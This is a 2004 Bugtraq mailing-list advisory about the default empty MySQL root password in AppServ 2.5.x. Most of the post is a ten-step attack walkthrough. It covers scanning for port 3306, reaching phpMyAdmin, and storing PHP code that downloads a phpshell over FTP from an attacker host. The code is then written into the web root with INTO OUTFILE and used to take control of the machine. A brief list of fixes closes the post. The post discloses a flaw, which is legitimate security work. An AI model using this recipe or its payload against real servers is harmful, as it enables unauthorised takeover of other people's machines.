[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041118161815.26349.qmail@www.securityfocus.com>
Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@...oo.com>
To: bugtraq@...urityfocus.com
Subject: AppServ 2.5.x and Prior Exploit
what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages.
Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver.
=====================================================
AppServ URL:http://www.appservnetwork.com
Vulnerability Ver: 2.5.X and prior
problem :
=================================
the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.
=================================
Expliot Method
1)scan tool (SuperScan or whatever)
this step to scan MySQL service on port 3306
2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer).
From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)
3)if we success the index page for AppServ open
4)Now we can edit the databases and tables in Mysql by phpmyadmin
From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)
5)default MySQL Server come with two database (test,mysql),our target is (mysql ).
Now we can add new table contains our exploit
- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :
==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY);
ftp_quit($conn_id);
?>
==============end=====================
the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.
6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'
7)Query.php contain Our PHP code
8)if we success we can reguest
(http://xxx.xxx.xxx.xxx/Query.php)
9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)
10) Game's Over
==================================================
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script
==============================================================
discovered by Saudi Linux
Powered by blists - more mailing lists